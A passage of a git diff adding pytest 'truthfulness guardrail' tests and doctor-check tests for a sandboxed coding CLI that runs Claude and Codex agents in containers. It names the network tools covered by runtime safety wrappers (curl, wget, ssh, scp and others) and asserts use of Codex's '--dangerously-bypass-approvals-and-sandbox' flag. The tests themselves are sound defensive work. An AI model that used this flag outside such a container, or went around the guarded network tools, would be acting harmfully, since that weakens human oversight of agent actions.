+def _extract_network_policy_values( + obj: object, + path: str = "$", +) -> list[tuple[str, str]]: + """Recursively extract (json-path, value) pairs for 'network_policy' keys.""" + results: list[tuple[str, str]] = [] + if isinstance(obj, dict): + for key, value in obj.items(): + current_path = f"{path}.{key}" + if key == "network_policy" and isinstance(value, str): + results.append((current_path, value)) + else: + results.extend(_extract_network_policy_values(value, current_path)) + elif isinstance(obj, list): + for i, item in enumerate(obj): + results.extend(_extract_network_policy_values(item, f"{path}[{i}]")) + return results + + +# =========================================================================== +# M004 safety truthfulness guardrails +# =========================================================================== + +CORE_SAFETY_DIR = SRC / "core" +ADAPTERS_DIR = SRC / "adapters" + + +# --------------------------------------------------------------------------- +# Test f: README must mention the scc support safety-audit command +# --------------------------------------------------------------------------- + + +def test_readme_mentions_safety_audit_command() -> None: + """README must document the ``scc support safety-audit`` command. + + S04 added this CLI surface for inspecting safety-check audit events. + The README command table or troubleshooting section must reference it. + """ + readme_text = README.read_text(encoding="utf-8") + assert "safety-audit" in readme_text, ( + "README.md does not mention 'safety-audit'. " + "The `scc support safety-audit` command (added in M004/S04) must be documented." + ) + + +# --------------------------------------------------------------------------- +# Test g: README must describe core safety engine (not plugin-only) +# --------------------------------------------------------------------------- + + +def test_readme_describes_core_safety_engine() -> None: + """README must mention the SCC-owned safety engine as a core capability. + + Per Constitution §9 (runtime-level safety beats provider luck) and M004, + the README should describe SCC's built-in safety engine — not attribute + command guardrails solely to the scc-safety-net plugin. + """ + readme_text = README.read_text(encoding="utf-8").lower() + has_safety_engine = "safety engine" in readme_text + has_runtime_safety = "runtime safety" in readme_text + assert has_safety_engine or has_runtime_safety, ( + "README.md does not mention 'safety engine' or 'runtime safety'. " + "M004 delivered an SCC-owned safety engine; the README must describe " + "it as a core capability per Constitution §9." + ) + + +# --------------------------------------------------------------------------- +# Test h: README enforcement scope mentions runtime wrappers +# --------------------------------------------------------------------------- + + +def test_readme_enforcement_scope_mentions_runtime_wrappers() -> None: + """README enforcement scope must mention runtime wrappers and their tool coverage. + + M004/S02 delivered runtime wrappers for 7 tools (git, curl, wget, ssh, scp, + sftp, rsync). The enforcement scope section must mention these wrappers and + note that they are defense-in-depth (topology + proxy remain the hard control). + """ + readme_text = README.read_text(encoding="utf-8") + # Must mention wrappers + assert re.search(r"[Ww]rappers?\b.*intercept|[Ww]rappers?\b.*defense", readme_text), ( + "README.md enforcement scope does not describe runtime wrappers as " + "defense-in-depth. M004/S02 wrappers must be documented." + ) + # Must mention at least the core network tools covered + for tool in ("curl", "wget", "ssh"): + assert tool in readme_text, ( + f"README.md does not mention '{tool}' in enforcement scope. " + f"M004 runtime wrappers cover this tool." + ) + + +# --------------------------------------------------------------------------- +# Test i: core safety module files must exist +# --------------------------------------------------------------------------- + + +def test_safety_engine_core_files_exist() -> None: + """All expected core safety modules from M004/S01 must exist on disk. + + These modules form the shared safety engine: + - safety_engine.py (orchestrator) + - shell_tokenizer.py (command parsing) + - git_safety_rules.py (destructive git detection) + - network_tool_rules.py (explicit network tool detection) + - safety_policy_loader.py (fail-closed policy loading from S04) + """ + expected = [ + CORE_SAFETY_DIR / "safety_engine.py", + CORE_SAFETY_DIR / "shell_tokenizer.py", + CORE_SAFETY_DIR / "git_safety_rules.py", + CORE_SAFETY_DIR / "network_tool_rules.py", + CORE_SAFETY_DIR / "safety_policy_loader.py", + ] + missing = [str(p.relative_to(ROOT)) for p in expected if not p.exists()] + assert not missing, ( + f"Core safety module files missing: {missing}. These are required M004 deliverables." + ) + + +# --------------------------------------------------------------------------- +# Test j: provider safety adapter files must exist +# --------------------------------------------------------------------------- + + +def test_safety_adapter_files_exist() -> None: + """Both provider safety adapters from M004/S03 must exist on disk. + + ClaudeSafetyAdapter and CodexSafetyAdapter are the provider-specific + UX/audit wrappers over the shared engine. + """ + expected = [ + ADAPTERS_DIR / "claude_safety_adapter.py", + ADAPTERS_DIR / "codex_safety_adapter.py", + ] + missing = [str(p.relative_to(ROOT)) for p in expected if not p.exists()] + assert not missing, ( + f"Safety adapter files missing: {missing}. These are required M004/S03 deliverables." + ) + + +# =========================================================================== +# M005 team-pack model truthfulness guardrails +# =========================================================================== + + +# --------------------------------------------------------------------------- +# Test k: Codex capability_profile must report supports_skills=True +# --------------------------------------------------------------------------- + + +def test_codex_capability_profile_supports_skills() -> None: + """Codex capability profile must report supports_skills=True. + + The Codex renderer writes skill metadata under .agents/skills/{name}/, + so the capability profile must not claim skills are unsupported. + """ + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + profile = CodexAgentProvider().capability_profile() + assert profile.supports_skills is True, ( + f"Codex capability_profile.supports_skills is {profile.supports_skills}. " + "The Codex renderer handles skills; this must be True." + ) + + +def test_codex_capability_profile_supports_native_integrations() -> None: + """Codex capability profile must report supports_native_integrations=True. + + The Codex renderer writes native integration metadata (rules, hooks, + instructions, plugins) so the capability profile must not deny this. + """ + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + profile = CodexAgentProvider().capability_profile() + assert profile.supports_native_integrations is True, ( + f"Codex capability_profile.supports_native_integrations is " + f"{profile.supports_native_integrations}. " + "The Codex renderer handles native integrations; this must be True." + ) + + +# --------------------------------------------------------------------------- +# Test l: Provider capability profiles must be asymmetric-truthful +# --------------------------------------------------------------------------- + + +def test_provider_profiles_asymmetric_and_truthful() -> None: + """Provider capability profiles must reflect actual renderer capabilities. + + Both providers support skills and native integrations (rendered via + their respective renderers). Surfaces are intentionally asymmetric + (D019/spec-06), but both must report True for supported features. + """ + from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + claude = ClaudeAgentProvider().capability_profile() + codex = CodexAgentProvider().capability_profile() + + # Both have renderers that handle skills and native integrations + assert claude.supports_skills is True + assert codex.supports_skills is True + assert claude.supports_native_integrations is True + assert codex.supports_native_integrations is True + + # Asymmetric: Codex does not support resume, Claude does + assert claude.supports_resume is True + assert codex.supports_resume is False + + # Provider IDs are distinct + assert claude.provider_id != codex.provider_id + + +# --------------------------------------------------------------------------- +# Test m: org-v1 schema must include governed_artifacts and enabled_bundles +# --------------------------------------------------------------------------- + + +def test_schema_includes_governed_artifacts_section() -> None: + """org-v1.schema.json must define a governed_artifacts property. + + M005 introduced governed artifacts as the canonical policy surface for + skills, MCP servers, and native integrations. The schema must reflect this. + """ + schema_path = SRC / "schemas" / "org-v1.schema.json" + assert schema_path.exists(), "org-v1.schema.json not found" + + schema = json.loads(schema_path.read_text(encoding="utf-8")) + props = schema.get("properties", {}) + assert "governed_artifacts" in props, ( + "org-v1.schema.json does not define a 'governed_artifacts' property. " + "M005 requires this section for artifact/bundle/binding definitions." + ) + + ga = props["governed_artifacts"] + ga_props = ga.get("properties", {}) + for required_key in ("artifacts", "bindings", "bundles"): + assert required_key in ga_props, ( + f"governed_artifacts schema missing '{required_key}' sub-property." + ) + + +def test_schema_profiles_include_enabled_bundles() -> None: + """Profile schema must include enabled_bundles for team-pack selection. + + Teams enable bundles (not raw artifacts). The schema must allow + enabled_bundles in profile definitions. + """ + schema_path = SRC / "schemas" / "org-v1.schema.json" + schema = json.loads(schema_path.read_text(encoding="utf-8")) + profile_props = ( + schema.get("properties", {}) + .get("profiles", {}) + .get("additionalProperties", {}) + .get("properties", {}) + ) + assert "enabled_bundles" in profile_props, ( + "Profile schema does not include 'enabled_bundles'. " + "Teams select bundles from governed_artifacts.bundles via this field." + ) + + +# --------------------------------------------------------------------------- +# Test n: Renderers must not overclaim — docstrings must say metadata-only +# --------------------------------------------------------------------------- + + +def test_renderer_docstrings_say_metadata_not_content() -> None: + """Renderer module docstrings must honestly describe output as metadata. + + Both renderers write SCC-managed JSON metadata files that reference + artifact sources. They do NOT fetch or install actual content. The + module docstrings must reflect this to prevent overclaiming. + """ + for renderer_name in ("claude_renderer.py", "codex_renderer.py"): + renderer_path = ADAPTERS_DIR / renderer_name + assert renderer_path.exists(), f"{renderer_name} not found" + source = renderer_path.read_text(encoding="utf-8") + assert "metadata" in source.lower()[:2000], ( + f"{renderer_name} module docstring does not mention 'metadata'. " + "The renderer writes metadata/references, not actual native content." + ) + + +# --------------------------------------------------------------------------- +# Test o: sync_marketplace_settings_for_start must be marked transitional +# --------------------------------------------------------------------------- + + +def test_sync_marketplace_settings_for_start_is_transitional() -> None: + """sync_marketplace_settings_for_start docstring must note it is transitional. + + This function predates the governed-artifact bundle pipeline. Its + docstring must explicitly note it is transitional so operators + understand the bundle pipeline is the canonical path. + """ + start_session_path = SRC / "application" / "start_session.py" + assert start_session_path.exists() + source = start_session_path.read_text(encoding="utf-8") + + # Find the function and its docstring + func_start = source.find("def sync_marketplace_settings_for_start") + assert func_start != -1, "sync_marketplace_settings_for_start not found" + + # Check the next ~500 chars for the transitional marker + context = source[func_start : func_start + 800] + assert "transitional" in context.lower(), ( + "sync_marketplace_settings_for_start docstring does not mention " + "'transitional'. It must be marked as predating the bundle pipeline." + ) + + +# --------------------------------------------------------------------------- +# Test p: bundle_resolver comment must not overclaim renderable for portables +# --------------------------------------------------------------------------- + + +def test_bundle_resolver_portable_comment_is_truthful() -> None: + """Bundle resolver must document that portable artifacts are renderable (D023). + + Skills and MCP servers without provider bindings are portable — they + can be rendered from source metadata alone. The resolver populates + portable_artifacts so renderers project them into provider-native surfaces. + The comment must reflect this D023 implementation. + """ + resolver_path = SRC / "core" / "bundle_resolver.py" + source = resolver_path.read_text(encoding="utf-8") + + # The comment should mention D023 and portable_artifacts + assert "D023" in source or "portable_artifacts" in source, ( + "bundle_resolver.py portable-artifact comment does not mention " + "D023 or portable_artifacts. The comment must document that " + "portable skills/MCP servers are renderable without bindings." + ) + + +# =========================================================================== +# M007 multi-provider runtime truthfulness guardrails +# =========================================================================== + + +# --------------------------------------------------------------------------- +# Test q: README title must say 'Sandboxed Coding CLI' (D045) +# --------------------------------------------------------------------------- + + +def test_readme_title_says_sandboxed_coding_cli() -> None: + """README title must say 'Sandboxed Coding CLI', not 'Sandboxed Claude CLI'. + + Per D045, the product name is provider-neutral. The title line must + contain 'Sandboxed Coding CLI' — not 'Sandboxed Claude CLI' or + the older 'Sandboxed Code CLI'. + """ + first_line = README.read_text(encoding="utf-8").splitlines()[0] + assert "Sandboxed Coding CLI" in first_line, ( + f"README.md title does not contain 'Sandboxed Coding CLI'. Got: {first_line!r}" + ) + assert "Sandboxed Claude CLI" not in first_line, ( + f"README.md title still contains stale 'Sandboxed Claude CLI'. Got: {first_line!r}" + ) + assert "Sandboxed Code CLI" not in first_line, ( + f"README.md title still contains older 'Sandboxed Code CLI'. Got: {first_line!r}" + ) + + +# --------------------------------------------------------------------------- +# Test r: ProviderRuntimeSpec exists in core contracts, registry in core +# --------------------------------------------------------------------------- + + +def test_provider_runtime_spec_exists_in_core() -> None: + """core/provider_registry.py must exist with PROVIDER_REGISTRY, and + core/contracts.py must define ProviderRuntimeSpec. + + These are M007/S01 deliverables — the multi-provider dispatch foundation. + """ + registry_path = SRC / "core" / "provider_registry.py" + contracts_path = SRC / "core" / "contracts.py" + + assert registry_path.exists(), "core/provider_registry.py missing (M007/S01 deliverable)" + assert contracts_path.exists(), "core/contracts.py missing" + + registry_src = registry_path.read_text(encoding="utf-8") + assert "PROVIDER_REGISTRY" in registry_src, ( + "core/provider_registry.py does not define PROVIDER_REGISTRY" + ) + + contracts_src = contracts_path.read_text(encoding="utf-8") + assert "ProviderRuntimeSpec" in contracts_src, ( + "core/contracts.py does not define ProviderRuntimeSpec" + ) + + +# --------------------------------------------------------------------------- +# Test s: fail-closed dispatch error exists in core/errors.py +# --------------------------------------------------------------------------- + + +def test_fail_closed_dispatch_error_exists() -> None: + """core/errors.py must define InvalidProviderError for fail-closed dispatch. + + When an unknown provider_id is requested, the dispatch must fail closed + with a typed error rather than silently falling back. M007/S01 delivers + this error class. + """ + errors_path = SRC / "core" / "errors.py" + assert errors_path.exists(), "core/errors.py missing" + + source = errors_path.read_text(encoding="utf-8") + assert "class InvalidProviderError" in source, ( + "core/errors.py does not define InvalidProviderError. " + "M007/S01 fail-closed dispatch requires this error class." + ) + + +# --------------------------------------------------------------------------- +# Test t: doctor check_provider_auth exists +# --------------------------------------------------------------------------- + + +def test_doctor_check_provider_auth_exists() -> None: + """doctor/checks/environment.py must define check_provider_auth. + + M007/S03 delivers provider-aware doctor checks. The check_provider_auth + function validates provider-specific authentication prerequisites. + """ + env_checks_path = SRC / "doctor" / "checks" / "environment.py" + assert env_checks_path.exists(), "doctor/checks/environment.py missing" + + source = env_checks_path.read_text(encoding="utf-8") + assert "def check_provider_auth" in source, ( + "doctor/checks/environment.py does not define check_provider_auth. " + "M007/S03 requires provider-aware doctor checks." + ) + + +# --------------------------------------------------------------------------- +# Test u: core/constants.py must NOT contain Claude-specific runtime constants +# --------------------------------------------------------------------------- + + +def test_core_constants_no_claude_specifics() -> None: + """core/constants.py must not contain Claude-specific runtime constants. + + Provider-specific values (SANDBOX_IMAGE, AGENT_NAME, DATA_VOLUME, + CLAUDE_IMAGE, CLAUDE_CONTAINER) belong in adapter modules, not in + core constants. This complements test_no_claude_constants_in_core.py + but lives here for documentation-truthfulness continuity. + """ + constants_path = SRC / "core" / "constants.py" + assert constants_path.exists(), "core/constants.py missing" + + source = constants_path.read_text(encoding="utf-8") + banned = [ + "SANDBOX_IMAGE", + "AGENT_NAME", + "DATA_VOLUME", + "CLAUDE_IMAGE", + "CLAUDE_CONTAINER", + "CODEX_IMAGE", + "CODEX_CONTAINER", + ] + found = [name for name in banned if name in source] + assert not found, ( + f"core/constants.py contains provider-specific constants: {found}. " + "These belong in adapter modules, not in the product-level constants file." + ) + + +# =========================================================================== +# M007/S05 decision-vs-code reconciliation guardrails +# =========================================================================== + + +# --------------------------------------------------------------------------- +# Test v: D033 — Codex launch argv includes --dangerously-bypass-approvals-and-sandbox +# --------------------------------------------------------------------------- + + +def test_d033_codex_bypass_flag_in_runner() -> None: + """D033: CodexAgentRunner must launch with --dangerously-bypass-approvals-and-sandbox. + + SCC's container isolation is the hard boundary; Codex's built-in + OS-level sandbox is redundant inside Docker. The flag must appear + in the Codex launch module that builds the container argv. + """ + launch_path = ADAPTERS_DIR / "codex_launch.py" + assert launch_path.exists(), "codex_launch.py missing" + source = launch_path.read_text(encoding="utf-8") + + assert "--dangerously-bypass-approvals-and-sandbox" in source, ( + "codex_launch.py does not contain '--dangerously-bypass-approvals-and-sandbox'. " + "D033 requires this flag for Codex launch inside SCC containers." + ) + + # Verify the runner imports from the launch module + runner_path = ADAPTERS_DIR / "codex_agent_runner.py" + assert runner_path.exists(), "codex_agent_runner.py missing" + runner_source = runner_path.read_text(encoding="utf-8") + assert "build_codex_container_argv" in runner_source, ( + "codex_agent_runner.py must import build_codex_container_argv from codex_launch" + ) + + +# --------------------------------------------------------------------------- +# Test w: D035 — AgentSettings uses rendered_bytes, OCI runtime is format-agnostic +# --------------------------------------------------------------------------- + + +def test_d035_agent_settings_rendered_bytes() -> None: + """D035: AgentSettings must use rendered_bytes, not content:dict. + + The runner serializes; the OCI runtime writes bytes verbatim. + This makes the sandbox runtime format-agnostic. + """ + import dataclasses + + from scc_cli.ports.models import AgentSettings + + field_names = {f.name for f in dataclasses.fields(AgentSettings)} + assert "rendered_bytes" in field_names, ( + "AgentSettings does not have a 'rendered_bytes' field. " + "D035 requires pre-rendered bytes instead of content:dict." + ) + assert "content" not in field_names, ( + "AgentSettings still has a 'content' field. " + "D035 replaced content:dict with rendered_bytes:bytes." + ) + + +def test_d035_oci_runtime_no_json_dumps_in_inject_settings() -> None: + """D035: OCI runtime _inject_settings must not call json.dumps. + + The runtime writes rendered_bytes verbatim — it is format-agnostic. + json.dumps in _inject_settings would re-introduce a JSON assumption. + """ + runtime_path = ADAPTERS_DIR / "oci_sandbox_runtime.py" + assert runtime_path.exists(), "oci_sandbox_runtime.py missing" + source = runtime_path.read_text(encoding="utf-8") + + # Find _inject_settings method body + inject_start = source.find("def _inject_settings") + assert inject_start != -1, "_inject_settings not found in OCI runtime" + + # Find the next method (def ...) after _inject_settings + next_def = source.find("\n def ", inject_start + 1) + if next_def == -1: + inject_body = source[inject_start:] + else: + inject_body = source[inject_start:next_def] + + assert "json.dumps" not in inject_body, ( + "OCI runtime _inject_settings still calls json.dumps. " + "D035 requires format-agnostic byte writing via rendered_bytes." + ) + + +# --------------------------------------------------------------------------- +# Test x: D037 — AgentProvider protocol has auth_check method +# --------------------------------------------------------------------------- + + +def test_d037_agent_provider_has_auth_check() -> None: + """D037: AgentProvider protocol must define auth_check() -> AuthReadiness. + + Auth readiness is adapter-owned. Doctor consumes the structured result. + """ + from scc_cli.ports.agent_provider import AgentProvider + + assert hasattr(AgentProvider, "auth_check"), ( + "AgentProvider protocol does not define auth_check. " + "D037 requires adapter-owned auth readiness checking." + ) + + +def test_d037_both_providers_implement_auth_check() -> None: + """D037: Both ClaudeAgentProvider and CodexAgentProvider must implement auth_check.""" + from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + assert hasattr(ClaudeAgentProvider, "auth_check"), ( + "ClaudeAgentProvider does not implement auth_check (D037)." + ) + assert hasattr(CodexAgentProvider, "auth_check"), ( + "CodexAgentProvider does not implement auth_check (D037)." + ) + + +# --------------------------------------------------------------------------- +# Test y: D040 — Codex config includes file-based auth store +# --------------------------------------------------------------------------- + + +def test_d040_codex_runner_forces_file_auth_store() -> None: + """D040: CodexAgentRunner must inject cli_auth_credentials_store='file'. + + Inside Docker containers, OS keyring is unavailable. File-based auth + caching ensures auth.json persists in the provider volume. + """ + runner_path = ADAPTERS_DIR / "codex_agent_runner.py" + assert runner_path.exists(), "codex_agent_runner.py missing" + source = runner_path.read_text(encoding="utf-8") + + assert "cli_auth_credentials_store" in source, ( + "codex_agent_runner.py does not set cli_auth_credentials_store. " + "D040 requires file-based auth caching for container reliability." + ) + # Must set to "file", not "keyring" or "auto" + assert '"file"' in source or "'file'" in source, ( + "codex_agent_runner.py does not set cli_auth_credentials_store to 'file'. " + "D040 requires file-based auth, not keyring or auto." + ) + + +# --------------------------------------------------------------------------- +# Test z: D041 — Codex settings path is workspace-scoped +# --------------------------------------------------------------------------- + + +def test_d041_codex_settings_scope_is_workspace() -> None: + """D041: Codex ProviderRuntimeSpec must use settings_scope='workspace'. + + Project-scoped .codex/config.toml in the workspace mount takes precedence + over user config without overwriting user-owned files. Claude uses 'home'. + """ + from scc_cli.core.provider_registry import PROVIDER_REGISTRY + + codex_spec = PROVIDER_REGISTRY.get("codex") + assert codex_spec is not None, "Codex not found in PROVIDER_REGISTRY" + assert codex_spec.settings_scope == "workspace", ( + f"Codex settings_scope is '{codex_spec.settings_scope}', expected 'workspace'. " + "D041 requires workspace-scoped config to avoid overwriting user preferences." + ) + + +def test_d041_claude_settings_scope_is_home() -> None: + """D041: Claude ProviderRuntimeSpec must use settings_scope='home'. + + Claude's settings.json lives in /home/agent/.claude/ (the provider + config dir). This is distinct from Codex's workspace-scoped pattern. + """ + from scc_cli.core.provider_registry import PROVIDER_REGISTRY + + claude_spec = PROVIDER_REGISTRY.get("claude") + assert claude_spec is not None, "Claude not found in PROVIDER_REGISTRY" + assert claude_spec.settings_scope == "home", ( + f"Claude settings_scope is '{claude_spec.settings_scope}', expected 'home'. " + "Claude settings inject to the provider config dir, not the workspace." + ) + + +# --------------------------------------------------------------------------- +# Test: product identity docs are consistent with D045 +# --------------------------------------------------------------------------- + + +def test_d001_product_identity_consistent() -> None: + """Current docs and metadata must use the provider-neutral product identity. + + The pyproject.toml description must not contain 'Claude' in a way + that implies the product is Claude-specific. + """ + pyproject = ROOT / "pyproject.toml" + assert pyproject.exists(), "pyproject.toml missing" + text = pyproject.read_text(encoding="utf-8") + + # The description line should not say "Sandboxed Claude CLI" + assert "Sandboxed Claude CLI" not in text, ( + "pyproject.toml still contains 'Sandboxed Claude CLI'. " + "Product metadata must stay provider-neutral." + ) + + +# --------------------------------------------------------------------------- +# Test: init.py .scc.yaml template uses D045 product name +# --------------------------------------------------------------------------- + + +def test_init_template_uses_d045_product_name() -> None: + """init.py .scc.yaml template must say 'Sandboxed Coding CLI' (D045). + + The generate_template_content() output is the first SCC artifact a new + user sees. It must use the canonical product name from D045 — not the + older 'Sandboxed Code CLI' (D030, superseded) and not the provider- + specific 'Sandboxed Claude CLI'. + """ + from scc_cli.commands.init import generate_template_content + + template = generate_template_content() + assert "Sandboxed Coding CLI" in template, ( + "init.py .scc.yaml template does not contain 'Sandboxed Coding CLI'. " + "D045 requires the canonical product name in all user-visible surfaces." + ) + assert "Sandboxed Code CLI" not in template, ( + "init.py .scc.yaml template still says 'Sandboxed Code CLI'. " + "D030 was superseded by D045; use 'Sandboxed Coding CLI'." + ) + assert "Sandboxed Claude CLI" not in template, ( + "init.py .scc.yaml template says 'Sandboxed Claude CLI'. " + "The product name must be provider-neutral per D045." + ) + + +# =========================================================================== +# M008 adapter dispatch consolidation guardrails +# =========================================================================== + + +# --------------------------------------------------------------------------- +# Test: provider_choice and setup use shared dispatch, not hardcoded dicts +# --------------------------------------------------------------------------- + + +def test_provider_choice_uses_shared_dispatch() -> None: + """provider_choice.py must not contain a hardcoded provider-to-adapter dict. + + After M008/S02/T03, collect_provider_readiness uses the shared + get_agent_provider helper from dependencies.py. No local + adapters_by_provider or provider_map dict should exist. + """ + choice_path = SRC / "commands" / "launch" / "provider_choice.py" + source = choice_path.read_text(encoding="utf-8") + + assert "adapters_by_provider" not in source, ( + "provider_choice.py still contains a hardcoded 'adapters_by_provider' dict. " + "Use the shared get_agent_provider() from dependencies.py instead." + ) + + +def test_setup_uses_shared_dispatch() -> None: + """setup.py must not contain a hardcoded provider_map dict. + + After M008/S02/T03, _run_provider_onboarding uses the shared + get_agent_provider helper from dependencies.py. No local + provider_map dict should exist. + """ + setup_path = SRC / "setup.py" + source = setup_path.read_text(encoding="utf-8") + + assert "provider_map" not in source, ( + "setup.py still contains a hardcoded 'provider_map' dict. " + "Use the shared get_agent_provider() from dependencies.py instead." + ) diff --git a/tests/test_doctor_artifact_checks.py b/tests/test_doctor_artifact_checks.py new file mode 100644 index 0000000..0cee2a8 --- /dev/null +++ b/tests/test_doctor_artifact_checks.py @@ -0,0 +1,599 @@ +"""Tests for governed-artifact doctor checks and support bundle diagnostics. + +Covers: +- check_team_context: team profile and bundle reporting +- check_bundle_resolution: resolution health for active provider +- check_catalog_health: catalog structural integrity +- build_artifact_diagnostics_summary: support-bundle integration +""" + +from __future__ import annotations + +from contextlib import ExitStack +from typing import Any +from unittest.mock import patch + +from scc_cli.core.governed_artifacts import ( + ArtifactBundle, + ArtifactInstallIntent, + ArtifactKind, + GovernedArtifact, + ProviderArtifactBinding, +) +from scc_cli.doctor.checks.artifacts import ( + build_artifact_diagnostics_summary, + check_bundle_resolution, + check_catalog_health, + check_team_context, +) +from scc_cli.ports.config_models import ( + GovernedArtifactsCatalog, + NormalizedOrgConfig, + NormalizedTeamConfig, + OrganizationInfo, +) + +# --------------------------------------------------------------------------- +# Test fixtures +# --------------------------------------------------------------------------- + + +def _make_org_config( + *, + profile_name: str = "dev-team", + bundles: tuple[str, ...] = (), + artifacts: dict[str, GovernedArtifact] | None = None, + catalog_bundles: dict[str, ArtifactBundle] | None = None, + bindings: dict[str, tuple[ProviderArtifactBinding, ...]] | None = None, +) -> NormalizedOrgConfig: + """Build a minimal NormalizedOrgConfig for testing.""" + team = NormalizedTeamConfig(name=profile_name, enabled_bundles=bundles) + catalog = GovernedArtifactsCatalog( + artifacts=artifacts or {}, + bundles=catalog_bundles or {}, + bindings=bindings or {}, + ) + return NormalizedOrgConfig( + organization=OrganizationInfo(name="Test Org"), + profiles={profile_name: team}, + governed_artifacts=catalog, + ) + + +def _make_raw_org( + *, + profile_name: str = "dev-team", + bundles: list[str] | None = None, + governed_artifacts: dict[str, Any] | None = None, +) -> dict[str, Any]: + """Build a raw org config dict for normalization tests.""" + raw: dict[str, Any] = { + "organization": {"name": "Test Org"}, + "profiles": { + profile_name: { + "description": "Test team", + } + }, + } + if bundles is not None: + raw["profiles"][profile_name]["enabled_bundles"] = bundles + if governed_artifacts is not None: + raw["governed_artifacts"] = governed_artifacts + return raw + + +# --------------------------------------------------------------------------- +# Patch targets +# --------------------------------------------------------------------------- + +_PATCH_RAW = "scc_cli.doctor.checks.artifacts._load_raw_org_config" +_PATCH_PROFILE = "scc_cli.doctor.checks.artifacts._get_selected_profile" +_PATCH_NORMALIZE = "scc_cli.doctor.checks.artifacts._normalize_org_config" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# check_team_context +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestCheckTeamContext: + """Tests for check_team_context().""" + + def test_standalone_mode_when_no_org_config(self) -> None: + """No org config → standalone info message.""" + with patch(_PATCH_RAW, return_value=None): + result = check_team_context() + + assert result is not None + assert result.passed is True + assert "standalone" in result.message.lower() + + def test_no_profile_selected(self) -> None: + """Org config present but no profile selected → warning.""" + with ( + patch(_PATCH_RAW, return_value={"organization": {"name": "X"}}), + patch(_PATCH_PROFILE, return_value=None), + ): + result = check_team_context() + + assert result is not None + assert result.passed is True + assert "no team profile" in result.message.lower() + + def test_profile_not_found_in_org(self) -> None: + """Selected profile doesn't exist in org → error with fix hint.""" + org = _make_org_config(profile_name="other-team") + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="missing-team"), + patch(_PATCH_NORMALIZE, return_value=org), + ): + result = check_team_context() + + assert result is not None + assert result.passed is False + assert "not found" in result.message + assert result.fix_hint is not None + + def test_profile_found_no_bundles(self) -> None: + """Active profile with no bundles → info.""" + org = _make_org_config(profile_name="dev-team", bundles=()) + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="dev-team"), + patch(_PATCH_NORMALIZE, return_value=org), + ): + result = check_team_context() + + assert result is not None + assert result.passed is True + assert "no bundles" in result.message.lower() + + def test_profile_with_bundles(self) -> None: + """Active profile with bundles → lists them.""" + org = _make_org_config( + profile_name="dev-team", + bundles=("core-safety", "mcp-tools"), + ) + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="dev-team"), + patch(_PATCH_NORMALIZE, return_value=org), + ): + result = check_team_context() + + assert result is not None + assert result.passed is True + assert "core-safety" in result.message + assert "mcp-tools" in result.message + + def test_handles_unexpected_exception(self) -> None: + """Unexpected error → fail-safe error result.""" + with patch(_PATCH_RAW, side_effect=RuntimeError("boom")): + result = check_team_context() + + assert result is not None + assert result.passed is False + assert "boom" in result.message + + +# ═══════════════════════════════════════════════════════════════════════════════ +# check_bundle_resolution +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestCheckBundleResolution: + """Tests for check_bundle_resolution().""" + + def test_none_when_no_org_config(self) -> None: + """No org config → None (skip).""" + with patch(_PATCH_RAW, return_value=None): + assert check_bundle_resolution() is None + + def test_none_when_no_profile(self) -> None: + """No selected profile → None.""" + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value=None), + ): + assert check_bundle_resolution() is None + + def test_none_when_no_bundles(self) -> None: + """Profile with empty bundles → None.""" + org = _make_org_config(profile_name="dev-team", bundles=()) + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="dev-team"), + patch(_PATCH_NORMALIZE, return_value=org), + ): + assert check_bundle_resolution() is None + + def test_resolution_success(self) -> None: + """Successful resolution → passed result with counts.""" + art = GovernedArtifact( + kind=ArtifactKind.SKILL, + name="safety-rules", + install_intent=ArtifactInstallIntent.REQUIRED, + ) + bundle = ArtifactBundle( + name="core-safety", + artifacts=("safety-rules",), + install_intent=ArtifactInstallIntent.REQUIRED, + ) + org = _make_org_config( + profile_name="dev-team", + bundles=("core-safety",), + artifacts={"safety-rules": art}, + catalog_bundles={"core-safety": bundle}, + ) + + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="dev-team"), + patch(_PATCH_NORMALIZE, return_value=org), + ): + result = check_bundle_resolution() + + assert result is not None + assert result.passed is True + assert "effective=1" in result.message + + def test_resolution_with_missing_bundle(self) -> None: + """Bundle not in catalog → error with diagnostics.""" + org = _make_org_config( + profile_name="dev-team", + bundles=("nonexistent-bundle",), + # Empty catalog — bundle won't resolve + ) + + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="dev-team"), + patch(_PATCH_NORMALIZE, return_value=org), + ): + result = check_bundle_resolution() + + assert result is not None + assert result.passed is False + assert "not found" in result.message + + def test_resolution_exception(self) -> None: + """Resolution crash → error result.""" + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="dev-team"), + patch( + _PATCH_NORMALIZE, + side_effect=RuntimeError("normalization failed"), + ), + ): + result = check_bundle_resolution() + + assert result is not None + assert result.passed is False + assert "failed" in result.message.lower() + + +# ═══════════════════════════════════════════════════════════════════════════════ +# check_catalog_health +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestCheckCatalogHealth: + """Tests for check_catalog_health().""" + + def test_none_when_no_org_config(self) -> None: + """No org config → None.""" + with patch(_PATCH_RAW, return_value=None): + assert check_catalog_health() is None + + def test_empty_catalog(self) -> None: + """No artifacts or bundles → info message.""" + org = _make_org_config() + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_NORMALIZE, return_value=org), + ): + result = check_catalog_health() + + assert result is not None + assert result.passed is True + assert "no governed artifacts" in result.message.lower() + + def test_healthy_catalog(self) -> None: + """All references valid → pass with counts.""" + art = 